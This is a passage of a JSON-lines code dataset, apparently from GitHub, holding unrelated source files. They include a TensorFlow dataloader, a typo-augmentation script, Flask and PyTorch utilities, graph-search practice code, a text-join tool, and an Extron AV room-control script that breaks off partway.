num_parallel_calls=self.AUTOTUNE)\n test_ds = test_list_ds.map(self.process_path, num_parallel_calls=self.AUTOTUNE)\n train = self.prepare_for_training(train_ds, batch_size)\n test = self.prepare_for_training(test_ds, batch_size)\n for image, label in train.take(1):\n print(\"Image shape: \", image.numpy().shape)\n print(\"Label: \", label.numpy())\n\n return train, test\n\n def loadtfds(self, dataset_name, batch_size=32): #not working\n # Load data from tensorflow_datasets\n raw_train, raw_test = tfds.load(name=dataset_name, split=[\"train\", \"test\"], batch_size=32)\n train = raw_train.map(lambda x: tf.image.resize(x['image'], (IMG_WIDTH, IMG_HEIGHT)))\n test = raw_test.map(lambda x: tf.image.resize(x['image'], (IMG_WIDTH, IMG_HEIGHT)))\n ds_train = train.shuffle(1000).repeat().batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n ds_test = test.shuffle(1000).repeat().batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n # for batch in ds_train:\n # ...\n return ds_train, ds_test\n\n\nif __name__ == '__main__':\n print(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\n path_root = os.path.abspath(os.path.dirname(__file__)) # '/content/gdrive/My Drive/data'\n bird_data = DataSet(path_root)\n #train_ds = bird_data.load(GPU=True, train=True, batch_size=32)\n #ds_train, ds_test = bird_data.loadtfds('caltech_birds2011')\n ds_train, ds_test = bird_data.load_gpu(batch_size=4)\n \"\"\"\n filename1 = 'train_ds.tfrecord'\n writer1 = tf.data.experimental.TFRecordWriter(filename1)\n writer1.write(train_ds)\n #read\n #raw_dataset = tf.data.TFRecordDataset(filenames)\n \"\"\"\n #image_batch, label_batch = next(iter(ds_train))\n\n","repo_name":"LindsayXX/DD2412_project","sub_path":"final_model/dataloaderGPUs.py","file_name":"dataloaderGPUs.py","file_ext":"py","file_size_in_byte":10064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"13775607899","text":"import random\nimport string\n\nfrom util.base_augmentation_script import read_original_dataset, output_to_file\n\n\ndef replace_n_chars(n):\n ori_data = read_original_dataset()\n new_dataset = {}\n for command, intent in ori_data.items():\n length = len(command)\n for _ in range(n):\n pos = random.randint(0, length)\n change_to = random.choice(string.ascii_lowercase)\n command = command[:pos] + change_to + command[pos + 1:]\n new_dataset[command] = intent\n return new_dataset\n\n\nfor k in range(1, 10):\n data = replace_n_chars(k)\n output_to_file(data, f'./typo_dataset/data_with_{k}_typo.json')\n","repo_name":"SongyuWang-UO/VA_project","sub_path":"typo_dataset/argumentation_script.py","file_name":"argumentation_script.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"71863355776","text":"#Variables\nkernel_file='Luxur'\nenv=Environment()\nenv['CFLAGS']=' -Wall -fstrength-reduce -fomit-frame-pointer\\\n -finline-functions -nostdinc -fno-builtin\\\n -fno-stack-protector'\nenv['CCCOMSTR']='[C] $SOURCES'\nenv['ASCOMSTR']='[as] $SOURCES'\nenv['LINKCOM']='ld -T link.ld -o $TARGET $SOURCES'\nenv['LINKCOMSTR']='[LD] $SOURCES > $TARGET'\n\n\ndebug = ARGUMENTS.get('debug', 0)\nif int(debug):\n\tenv.Append(CCFLAGS = ' -g')\n\tenv['CCCOMSTR']='[C] [DBG] $SOURCES'\n\tenv['ASCOMSTR']='[AS][DBG] $SOURCES'\n\nlnkd = Builder(action = 'ld -T link.ld -o $TARGET $SOURCES')\nenv.Append(BUILDERS = {'Linkit' : lnkd})\n\nExport('env')\nobjs=(SConscript(['boot/SConscript',\n 'kernel/SConscript',\n\t\t 'lib/SConscript'],'env'))\n\n\n#linkeamos los Objetos en el kernel\nenv.Program(kernel_file,objs)\n","repo_name":"M4c0t/IndiaOS","sub_path":"LICENSE.md/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"9724489256","text":"import math\nimport pandas as pd\nimport simplepbr\nfrom direct.showbase.ShowBase import ShowBase\nfrom panda3d.core import *\n\nIMAGE_WIDTH = 640\nIMAGE_HEIGHT = 480\nCAMERA_FOV = (math.pi/180)*60\n\n\n\n\n\nclass MyApp(ShowBase):\n\t\n\tdef __init__(self):\n\t\t\n\t\tShowBase.__init__(self)\n\t\t#simplepbr.init()\n\t\t#myMaterial = Material()\n\t\t#myMaterial.setAmbient((1, 1, 1, 1)) # Make this material blue\n\t\talight = AmbientLight('alight')\n\t\talight.setColor((1.0, 1.0, 1.0, 1))\n\t\t\n\t\t\n\t\t# Load the environment model.\n\n\t\tself.scene = self.loader.loadModel(\"part.bam\")\n\t\tself.scene.setColor(1.0, 1.0, 1.0, 1.0)\n\t\talnp = self.scene.attachNewNode(alight)\n\t\tself.scene.setLight(alnp)\n\t\t#self.scene.setMaterial(myMaterial)\n\t\t\n\t\t# Reparent the model to render.\n\n\t\tself.scene.reparentTo(self.render)\n\n\t\t# Apply scale and position transforms on the model.\n\n\t\tself.scene.setScale(0.25, 0.25, 0.25)\n\n\t\tself.scene.setPos(-8, 42, 0)\n\n\n'''Returns a Pandas DataFrame with predefined fields'''\ndef init_df():\n\tdata = pd.DataFrame(\n\t\t\t{'filename': pd.Series(dtype='str'), 'class': pd.Series(dtype='str'), 'id': pd.Series(dtype='int'), 'cam_pos': pd.Series(dtype='str'),\n\t\t\t 'cam_axis': pd.Series(dtype='str'), 'part_pos': pd.Series(dtype='str')} )\n\treturn data\n\t\t\n\nif __name__ == \"__main__\":\n\tdata = init_df()\n\tdata.loc[len(data.index)] = ['test', 'part', 0, '[3;3;-3]', '[-3;-3;3]', '[0;0;0]']\n\t\n\tapp = MyApp()\n\tapp.run()\n","repo_name":"OzzyP97/KONE.533-Automated-Data-Generation-Setup","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"20532494993","text":"import logging\nfrom sqlalchemy.orm import Session\n\nfrom app.models import models\nfrom app import schemas\n\nfrom datetime import datetime\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s %(message)s\",\n handlers=[\n logging.FileHandler(\"/tmp/VideoConfLog.log\"),\n logging.StreamHandler()\n ]\n)\nlogger = logging.getLogger(\"VideoConfLog\")\n\n\ndef create_conference(db: Session):\n db_item = models.VideoConference()\n db.add(db_item)\n db.commit()\n\n return db_item\n","repo_name":"adamteale/video_conference_example","sub_path":"backend/app/app/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"}
+{"seq_id":"34966962370","text":"from collections import deque\n\nn, m, start = map(int, input().split())\nvertexList = [ [] for _ in range(n+1) ]\ncheck = [False]*(n+1)\n\nfor _ in range(m):\n u, v = map(int, input().split())\n vertexList[u].append(v)\n vertexList[v].append(u)\nfor i in range(1, n+1):\n vertexList[i].sort() \n\ndef dfs(x):\n global check\n check[x] = True\n print(x, end=' ')\n for adjacentVertex in vertexList[x]:\n if check[adjacentVertex] == False:\n dfs(adjacentVertex)\n\ndef bfs(x):\n check = [False]*(n+1)\n q = deque()\n q.append(x)\n check[x] = True\n while q:\n next_vertex = q.popleft()\n print(next_vertex, end=' ')\n for adjacentVertex in vertexList[next_vertex]:\n if check[adjacentVertex] == False:\n check[adjacentVertex] = True\n q.append(adjacentVertex)\n\ndfs(start)\nprint()\nbfs(start)","repo_name":"kizarrd/algorithm_with_python","sub_path":"dfs_and_bfs/acmicpc1260.py","file_name":"acmicpc1260.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"41923353643","text":"from flask import Flask, request, send_from_directory, send_file, make_response\nfrom flask_cors import CORS\nfrom time import perf_counter\n\nfrom compress.lib import compressImage\n\napp = Flask(__name__,\n static_folder=None)\n\ncors = CORS(app,\n resources={\n r'/api/*' : {\n 'origins' : '*',\n 'expose_headers': ['Compress-Time']\n }})\n\n@app.route('/api/compress', methods=['POST'])\ndef compress_route():\n try:\n file = request.files['file']\n ratio = int(request.form['rate'])\n\n startTime = perf_counter()\n result = compressImage(file, ratio)\n endTime = perf_counter()\n\n response = make_response(send_file(result, mimetype=file.mimetype))\n response.headers['Compress-Time'] = endTime - startTime\n return response\n except:\n return '', 501\n\n@app.route('/', defaults={ 'path': 'index.html' })\n@app.route('/')\ndef catch_all(path):\n return send_from_directory('./client/dist', path)\n","repo_name":"hilyafadhilah/Algeo02-20017","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"8874161521","text":"import unittest\n\nimport numpy as np\nimport torch\nfrom torch.nn import Conv2d, Module, ReLU, MaxPool2d, Linear, LogSoftmax\n\nfrom torch_pp import StandardScaler\nfrom torch_pp.minmaxscaler import MinMaxScaler\n\n\nclass Cnn(Module):\n def __int__(self, num_channels: int, classes: int):\n super(self).__init__()\n self.scaler = StandardScaler()\n self.conv1 = Conv2d(in_channels=num_channels, out_channels=20, kernel_size=(5, 5))\n self.relu1 = ReLU()\n self.maxpool1 = MaxPool2d(kernel_size=(2, 2), stride=(2, 2))\n self.fc2 = Linear(in_features=500, out_features=classes)\n self.logSoftmax = LogSoftmax(dim=1)\n\n def forward(self, x):\n x = self.scaler.fit_transform(x)\n x = self.conv1(x)\n x = self.relu1(x)\n x = self.maxpool1(x)\n x = self.fc2(x)\n output = self.logSoftmax(x)\n return output\n\n\nclass TestScalers(unittest.TestCase):\n def test_standard_scaler_transform(self):\n input_x = torch.from_numpy(np.array([[20., 1.], [-3., 700.], [-11., 3.]])).to(dtype=torch.double)\n scaler = StandardScaler()\n transformed_x = scaler.fit_transform(input_x)\n transformed_back_x = scaler.inverse_transform(transformed_x)\n torch.testing.assert_close(input_x, transformed_back_x)\n\n def test_minmax_scaler_transform(self):\n input_x = torch.from_numpy(np.array([[20., 1.], [-3., 700.], [-11., 3.]])).to(dtype=torch.float64)\n scaler = MinMaxScaler()\n transformed_x = scaler.fit_transform(input_x)\n transformed_back_x = scaler.inverse_transform(transformed_x)\n torch.testing.assert_close(input_x, transformed_back_x)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Pravuk/torch-preprocessing","sub_path":"torch_pp/test_.py","file_name":"test_.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39488664230","text":"#!/usr/bin/env python\n\"\"\"\nNAME:\n\n hashjoin: join a small lookup table with unsorted targets\n\nDESCRIPTION:\n\nI wanted a quick way to annotate lines with additional metadata\nfrom a lookup file. I had a set of UUIDS and human readable\nlabels, and a set of target files that would be decorated by combining\nthe input line with the lookup value when the lookup key was present\nin the line.\n\nsample lookup: key value\n\nid1 Item 1\nid2 Another item\n\ntarget:\n\nThis is id1 and other stuff\nAnd here id2 is here\n\n\nThe join linux join command requires sorted input.\nHowever, given a small lookup table hashjoin allows for\njoining of unsorted lookup and target table(s).\n\nhashjoin.py uses the first field of the lookup as the key,\nand then \n\nAUTHOR:\n\n Jud Dagnall \n\nEXAMPLES:\n\n # common usage:\n hashjoin \n\n\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nimport fileinput\nimport json\nimport logging\nimport re\nimport sys\n\nTIMESTAMP_FORMAT='%(asctime)s %(levelname)s - %(message)s'\n\ndef parse_args(args=None):\n desc=\"\"\n p = argparse.ArgumentParser(description=desc)\n #p.add_argument('', help=\"default: %(default)s\", default='')\n p.add_argument('-d', '--delimiter', \n help=\"regex delimiter for lookup table\",\n default='\\s+')\n p.add_argument('-D', '--debug', action='store_true',\n help='enable debugging')\n p.add_argument('-o', '--only', action='store_true', \n help=\"print only lines with matches\")\n p.add_argument('-O', '--output-delimiter', \n help=\"output delimiter. default = space\",\n default=\" \")\n p.add_argument('-T', '--tab-output', action='store_true',\n help=\"use tab as the output delimiter\")\n p.add_argument('lookup', help='whitespace delimited lookup')\n p.add_argument('targets', nargs='*', \n help='targets for lookup')\n\n \n # accept arguments as a param, so we\n # can import and run this module with a commandline-like\n # syntax.\n if args is None: \n args = sys.argv[1:]\n return p.parse_args(args)\n\ndef run(opts):\n logging.debug(\"starting\")\n lookups = {}\n if opts.tab_output:\n opts.output_delimiter = \"\\t\"\n\n delimiter = re.compile(opts.delimiter)\n\n for line in open(opts.lookup):\n k, v = re.split(delimiter, line.rstrip(\"\\n\"), 1)\n lookups[k] = v\n logging.debug('\"%s\" -> \"%s\"', k, v)\n\n logging.debug(\"lookups: %s\", lookups)\n for line in fileinput.input(opts.targets):\n line = line.rstrip(\"\\n\")\n matched = False\n for pattern, extra in lookups.items():\n if pattern in line:\n line = line + opts.output_delimiter + extra\n matched = True\n logging.debug('matched %s', pattern)\n break\n if matched or not opts.only:\n print(line)\n\nif __name__ == '__main__':\n opts = parse_args(sys.argv[1:])\n debug_level = logging.DEBUG if opts.debug else logging.INFO\n logging.basicConfig(level=debug_level ,format=TIMESTAMP_FORMAT)\n run(opts)\n","repo_name":"thejud/scripts","sub_path":"bin/hashjoin.py","file_name":"hashjoin.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"13816834773","text":"#!/usr/bin/env python3\n\nimport os\nimport numpy as np\nfrom functools import reduce\n\nfile = \"input.txt\"\n\ndata = np.array([line.rstrip('\\n') for line in open(file)])\nbit_length = len(data[0])\ndata_length = len(data)\ncommon_array = [0 for _ in range(bit_length)]\nprint(common_array)\nfor line in data:\n for i, bit in enumerate(line):\n if bit == '0':\n common_array[i] -= 1\n elif bit == '1':\n common_array[i] += 1\nprint(common_array)\n\ngamma = 0\nfor co in common_array:\n gamma = gamma << 1\n if co > 0:\n gamma += 1\n elif co == 0:\n print('Something fishy')\n\nepsilon = (gamma^(2**(bit_length)-1))\nprint(f\"Gamma {gamma:>08b}\")\nprint(f\"Epilson {epsilon:>08b}\")\nprint(f\"Power {gamma*epsilon:>08b}\")\nprint(f\"Power {gamma*epsilon}\")\n\n\n# second\nmost_co_data = np.array([[int(i) for i in line] for line in data])\nfor bit_i in range(bit_length):\n if len(most_co_data) == 1:\n break\n most_common = -((len(most_co_data)+1)//2) + sum(most_co_data[:,bit_i])\n if most_common >= 0:\n most_common = 1\n else:\n most_common = 0\n most_co_data = np.array([dat for dat in most_co_data if dat[bit_i]==most_common])\noxy = reduce(lambda a, b: ((a<<1) + b), most_co_data[0])\nprint(f\"Oxy:\\t\\t{oxy}\")\nprint(f\"Oxy:\\t\\t{oxy:>08b}\")\n\nlest_co_data = np.array([[int(i) for i in line] for line in data])\nfor bit_i in range(bit_length):\n if len(lest_co_data) == 1:\n break\n lest_common = -(len(lest_co_data+1))//2 + sum(lest_co_data[:,bit_i])\n if lest_common >= 0:\n lest_common = 0\n else:\n lest_common = 1\n lest_co_data = np.array([dat for dat in lest_co_data if dat[bit_i]==lest_common])\nco2 = reduce(lambda a, b: ((a<<1) + b), lest_co_data[0])\nprint(f\"CO2:\\t\\t{co2}\")\nprint(f\"CO2:\\t\\t{co2:>08b}\")\n\nprint(f\"Life support:\\t{co2*oxy}\")\n","repo_name":"fridewald/aco2021","sub_path":"03/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"34744483391","text":"\"\"\"--------------------------------------------------------------------------\n Business | Asesores y Consultores en Tecnología S.A. de C.V.\n Programmer | Dyanko Cisneros Mendoza\n Customer | Human Quality\n Project | Meeting Room\n Version | 0.1 --------------------------------------------------------- \"\"\"\n\n## CONTROL SCRIPT IMPORT -------------------------------------------------------\nfrom gui import TLP, BTN, BTNPAGE, BTNGROUP, BTNSTATE, LBL, LVL, POPUP, PAGE\nfrom extronlib import event, Version\nfrom extronlib.device import eBUSDevice, ProcessorDevice, UIDevice\nfrom extronlib.interface import (ContactInterface, DigitalIOInterface, \\\n EthernetClientInterface, EthernetServerInterfaceEx, FlexIOInterface, \\\n IRInterface, RelayInterface, SerialInterface, SWPowerInterface, \\\n VolumeInterface)\nfrom extronlib.ui import Button, Knob, Label, Level\nfrom extronlib.system import Clock, MESet, Wait\n\n## MODULE IMPORT ---------------------------------------------------------------\n## IP:\nimport extr_matrix_DXPHD4k_Series_v1_1_1_0 as DeviceA\nimport extr_other_MediaPort200_v1_1_0_0 as DeviceB\nimport csco_vtc_SX_Series_TC73_v1_3_0_0 as DeviceC\nimport biam_dsp_TesiraSeries_v1_5_20_0 as DeviceD\nimport lutr_lc_CasetaWirelessSmartBridgePro_v1_0_2_0 as DeviceE\n## RS-232:\nimport smfy_controller_RS485_RTS_Transmitter_v1_0_0_0 as DeviceF\n## IR/Serial\n\nprint(Version())\n\n## PROCESOR DEFINITION ---------------------------------------------------------\nIPCP = ProcessorDevice('IPlink')\n\n## IP:\nMATRIX = DeviceA.EthernetClass('10.10.10.10', 23, Model='DXP 88 HD 4k')\nBRIDGE = DeviceB.EthernetClass('10.10.10.11', 23, Model='MediaPort 200')\nCISCO = DeviceC.EthernetClass('10.10.10.12', 23, Model='SX20 TC7.3.X')\nBIAMP = DeviceD.EthernetClass('192.168.10.150', 23, Model='TesiraFORTE CI')\nLUTRON = DeviceE.EthernetClass('192.168.10.15', 23, Model='Caseta Wireless Smart Bridge Pro')\n## RS-232:\nSOMFY = DeviceF.SerialClass(IPCP, 'COM1', Baud=9600, Model='RS485 RTS Transmitter')\n\n## INITIALIZATE ----------------------------------------------------------------\ndef initialize():\n \"\"\"This is the last function that loads when starting the system \"\"\"\n ## OPEN CONNECTION SOCKETS\n ## IP\n MATRIX.Connect()\n BRIDGE.Connect()\n CISCO.Connect()\n BIAMP.Connect()\n LUTRON.Connect()\n ## RS-232\n SOMFY.Initialize()\n\n ## RECURSIVE FUNCTIONS\n update_loop_matrix()\n update_loop_bridge()\n update_loop_cisco()\n update_loop_biamp()\n\n ## POWER COUNTER VARIABLE\n global PWRCOUNT\n PWRCOUNT = 4 #Color Pwr Button Feedback 4=Too Much Red Button, 3=Red, 2=Slow Red, 1=Gray\n\n ## DATA INITIALIZE\n ## Cisco Camera PAGE\n CISCO_DATA['PresetMode'] = 'Recall'\n CISCO_DATA['Camera'] = 'Local'\n BTNGROUP['VCPTZ'].SetCurrent(BTN['VCRecall'])\n BTNGROUP['VCCam'].SetCurrent(BTN['VCLocal'])\n\n ## Cisco Dial PAGE\n global dialerVC ## To access the Dial String variable in all program\n dialerVC = '' ## Clean the Dial String Variable\n CISCO_DATA['Dial'] = '' ## Clean the Dial Data in Dictionary\n LBL['VCDial'].SetText('') ## Clean the Dial Data in GUI\n\n ## VoIP Dial PAGE\n global dialerVI ## To access the Dial String variable in all program\n dialerVI = '' ## Clean the Dial String Variable\n VOIP_DATA['Dial'] = '' ## Clean the Dial Data in Dictionary\n LBL['Dial'].SetText('') ## Clean the Dial Data in gui\n\n ## TOUCH PANEL FUNCTIONS\n TLP.HideAllPopups()\n TLP.ShowPage(PAGE['Index'])\n BTNGROUP['Main'].SetCurrent(None) ##Turn Off all feedback button in GUI Main PAGE\n 
LBL['CountAll'].SetText('')\n\n ## NOTIFY TO CONSOLE\n print('System Inicializate')\n pass\n\n## SUBSCRIBE FUNCTIONS ---------------------------------------------------------\ndef subscribe_matrix():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n MATRIX.SubscribeStatus('ConnectionStatus', None, matrix_parsing)\n MATRIX.SubscribeStatus('OutputTieStatus', {'Output':'1', 'Tie Type':'Video'}, matrix_parsing)\n MATRIX.SubscribeStatus('OutputTieStatus', {'Output':'2', 'Tie Type':'Video'}, matrix_parsing)\n MATRIX.SubscribeStatus('OutputTieStatus', {'Output':'3', 'Tie Type':'Video'}, matrix_parsing)\n MATRIX.SubscribeStatus('OutputTieStatus', {'Output':'4', 'Tie Type':'Video'}, matrix_parsing)\n MATRIX.SubscribeStatus('OutputTieStatus', {'Output':'1', 'Tie Type':'Audio'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '1'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '2'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '3'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '4'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '5'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '6'}, matrix_parsing)\n pass\n\ndef subscribe_bridge():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n BRIDGE.SubscribeStatus('ConnectionStatus', None, bridge_parsing)\n BRIDGE.SubscribeStatus('HDMIInputEDID', None, bridge_parsing)\n BRIDGE.SubscribeStatus('USBHostStatus', None, bridge_parsing)\n BRIDGE.SubscribeStatus('USBTerminalType', None, bridge_parsing)\n BRIDGE.SubscribeStatus('VideoSendStatus', None, bridge_parsing)\n BRIDGE.SubscribeStatus('VideoSignalPresence', None, bridge_parsing)\n pass\n\ndef subscribe_cisco():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n CISCO.SubscribeStatus('ConnectionStatus', None, cisco_parsing)\n CISCO.SubscribeStatus('CallStatus', {'Call':'1'}, cisco_parsing)\n CISCO.SubscribeStatus('PresentationMode', None, cisco_parsing)\n CISCO.SubscribeStatus('Standby', None, cisco_parsing)\n CISCO.SubscribeStatus('AutoAnswer', None, cisco_parsing)\n CISCO.SubscribeStatus('Volume', None, cisco_parsing)\n pass\n\ndef subscribe_biamp():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n BIAMP.SubscribeStatus('ConnectionStatus', None, biamp_parsing)\n BIAMP.SubscribeStatus('MuteControl', {'Instance Tag':'lvl_spk', 'Channel':'1'}, biamp_parsing)\n BIAMP.SubscribeStatus('MuteControl', {'Instance Tag':'lvl_vcrx', 'Channel':'1'}, biamp_parsing)\n BIAMP.SubscribeStatus('MuteControl', {'Instance Tag':'mute_mix', 'Channel':'1'}, biamp_parsing)\n BIAMP.SubscribeStatus('LevelControl', {'Instance Tag':'lvl_spk', 'Channel':'1'}, biamp_parsing)\n pass\n\ndef subscribe_lutron():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n LUTRON.SubscribeStatus('ConnectionStatus', None, lutron_parsing)\n pass\n\ndef subscribe_somfy():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n SOMFY.SubscribeStatus('ConnectionStatus', None, somfy_parsing)\n pass\n\n## UPDATE FUNCTIONS ------------------------------------------------------------\ndef update_matrix():\n \"\"\"This send Update Commands to Device\"\"\"\n MATRIX.Update('OutputTieStatus', {'Output':'1', 'Tie Type':'Video'})\n MATRIX.Update('OutputTieStatus', {'Output':'2', 'Tie Type':'Video'})\n MATRIX.Update('OutputTieStatus', {'Output':'3', 'Tie Type':'Video'})\n MATRIX.Update('OutputTieStatus', {'Output':'4', 'Tie Type':'Video'})\n MATRIX.Update('OutputTieStatus', {'Output':'1', 'Tie Type':'Audio'})\n 
MATRIX.Update('SignalStatus', {'Input' : '1'})\n    MATRIX.Update('SignalStatus', {'Input' : '2'})\n    MATRIX.Update('SignalStatus', {'Input' : '3'})\n    MATRIX.Update('SignalStatus', {'Input' : '4'})\n    MATRIX.Update('SignalStatus', {'Input' : '5'})\n    MATRIX.Update('SignalStatus', {'Input' : '6'})\n    pass\n\ndef update_bridge():\n    \"\"\"This send Update Commands to Device\"\"\"\n    BRIDGE.Update('ConnectionStatus')\n    BRIDGE.Update('HDMIInputEDID')\n    BRIDGE.Update('USBHostStatus')\n    BRIDGE.Update('USBTerminalType')\n    BRIDGE.Update('VideoSendStatus')\n    BRIDGE.Update('VideoSignalPresence')\n    pass\n\ndef update_cisco():\n    \"\"\"This send Update Commands to Device\"\"\"\n    CISCO.Update('CallStatus', {'Call':'1'})\n    CISCO.Update('PresentationMode')\n    CISCO.Update('Standby')\n    CISCO.Update('AutoAnswer')\n    CISCO.Update('Volume')\n    pass\n\ndef update_biamp():\n    \"\"\"This send Update Commands to Device\"\"\"\n    BIAMP.Update('MuteControl', {'Instance Tag':'lvl_spk', 'Channel':'1'})\n    BIAMP.Update('MuteControl', {'Instance Tag':'lvl_vcrx', 'Channel':'1'})\n    BIAMP.Update('MuteControl', {'Instance Tag':'mute_mix', 'Channel':'1'})\n    BIAMP.Update('LevelControl', {'Instance Tag':'lvl_spk', 'Channel':'1'})\n    pass\n\ndef update_lutron():\n    \"\"\"This send Update Commands to Device\"\"\"\n    LUTRON.Update('OutputLevel', {'Integration ID':'2'})\n    pass\n\n## DATA PARSING FUNCTIONS ------------------------------------------------------\n## These functions receive the data of the devices in real time\n## Each function stores the parsed data in dictionaries and activate feedback\n## Each function works with the subscription methods of the Python modules\ndef matrix_parsing(command, value, qualifier):\n    \"\"\"Retrieve the Real Information of the Device \"\"\"\n    if command == 'ConnectionStatus':\n        print('Matrix Module Conex status: {}'.format(value))\n\n        if value == 'Connected':\n            MATRIX_DATA['ConexModule'] = True\n            BTN['LANMatrix'].SetState(1)\n        else:\n            MATRIX_DATA['ConexModule'] = False\n            BTN['LANMatrix'].SetState(0)\n            ## Disconnect the IP Socket\n            MATRIX.Disconnect()\n\n    elif command == 'OutputTieStatus':\n        ## Output and Tie Type are checked together: Output 1 carries both a\n        ## Video tie (Left Display) and an Audio tie (de-embedder) below\n        if qualifier['Output'] == '1' and qualifier['Tie Type'] == 'Video': ## Left Display\n            if value == '1':\n                BTNGROUP['LCD1_S'].SetCurrent(BTN['LHDMI'])\n            elif value == '2':\n                BTNGROUP['LCD1_S'].SetCurrent(BTN['LVGA'])\n            elif value == '3':\n                BTNGROUP['LCD1_S'].SetCurrent(BTN['LPTZ'])\n            elif value == '4':\n                BTNGROUP['LCD1_S'].SetCurrent(BTN['LShare'])\n\n        elif qualifier['Output'] == '2' and qualifier['Tie Type'] == 'Video': ## Right Display\n            if value == '1':\n                BTNGROUP['LCD2_S'].SetCurrent(BTN['RHDMI'])\n            elif value == '2':\n                BTNGROUP['LCD2_S'].SetCurrent(BTN['RVGA'])\n            elif value == '3':\n                BTNGROUP['LCD2_S'].SetCurrent(BTN['RPTZ'])\n            elif value == '4':\n                BTNGROUP['LCD2_S'].SetCurrent(BTN['RShare'])\n\n        elif qualifier['Output'] == '3' and qualifier['Tie Type'] == 'Video': ## VC Content Input\n            if value == '1':\n                BTNGROUP['VCPC_S'].SetCurrent(BTN['VCHDMI'])\n            elif value == '2':\n                BTNGROUP['VCPC_S'].SetCurrent(BTN['VCVGA'])\n            elif value == '3':\n                BTNGROUP['VCPC_S'].SetCurrent(BTN['VCPTZ'])\n            elif value == '4':\n                BTNGROUP['VCPC_S'].SetCurrent(BTN['VCShare'])\n\n        elif qualifier['Output'] == '4' and qualifier['Tie Type'] == 'Video': ## Webex Input\n            if value == '1':\n                BTNGROUP['Webex'].SetCurrent(BTN['WHDMI'])\n            elif value == '2':\n                BTNGROUP['Webex'].SetCurrent(BTN['WVGA'])\n            elif value == '3':\n                BTNGROUP['Webex'].SetCurrent(BTN['WPTZ'])\n            elif value == '4':\n                BTNGROUP['Webex'].SetCurrent(BTN['WShare'])\n            elif value == 
'5':\n                BTNGROUP['Webex'].SetCurrent(BTN['WCisco1'])\n            elif value == '6':\n                BTNGROUP['Webex'].SetCurrent(BTN['WCisco2'])\n\n        elif qualifier['Output'] == '1' and qualifier['Tie Type'] == 'Audio': ## Audio HDMI Matrix Dembedder\n            if value == '1':\n                BTNGROUP['Audio'].SetCurrent(BTN['XHDMI'])\n            elif value == '2':\n                BTNGROUP['Audio'].SetCurrent(BTN['XVGA'])\n            elif value == '4':\n                BTNGROUP['Audio'].SetCurrent(BTN['XShare'])\n\n    elif command == 'SignalStatus':\n        ## Inputs '1'..'6' map one-to-one onto BTN['Signal1']..BTN['Signal6']\n        BTN['Signal' + qualifier['Input']].SetState(1 if value == 'Signal Detected' else 0)\n    pass\n\ndef bridge_parsing(command, value, qualifier):\n    \"\"\"Retrieve the Real Information of the Device \"\"\"\n    if command == 'ConnectionStatus':\n        print('Bridge Module Conex status: {}'.format(value))\n\n        if value == 'Connected':\n            BRIDGE_DATA['ConexModule'] = True\n            BTN['LanBridge'].SetState(1)\n        else:\n            BRIDGE_DATA['ConexModule'] = False\n            BTN['LanBridge'].SetState(0)\n            ## Disconnect the IP Socket\n            BRIDGE.Disconnect()\n\n    elif command == 'HDMIInputEDID':\n        print(value)\n        BRIDGE_DATA['InputEDID'] = value\n\n    elif command == 'USBHostStatus':\n        print(value)\n        BRIDGE_DATA['USBHost'] = value\n\n    elif command == 'USBTerminalType':\n        print(value)\n        BRIDGE_DATA['USBTerminal'] = value\n\n    elif command == 'VideoSendStatus':\n        print(value)\n        if value == 'On':\n            BRIDGE_DATA['VideoSend'] = True\n        else:\n            BRIDGE_DATA['VideoSend'] = False\n\n    elif command == 'VideoSignalPresence':\n        print(value)\n        if value == 'Signal':\n            BRIDGE_DATA['VideoSignal'] = True\n        else:\n            BRIDGE_DATA['VideoSignal'] = False\n    pass\n\ndef cisco_parsing(command, value, qualifier):\n    \"\"\"Retrieve the Real Information of the Device \"\"\"\n    if command == 'ConnectionStatus':\n        print('Cisco Module Conex status: {}'.format(value))\n\n        if value == 'Connected':\n            CISCO_DATA['ConexModule'] = True\n            BTN['LANCisco'].SetState(1)\n        else:\n            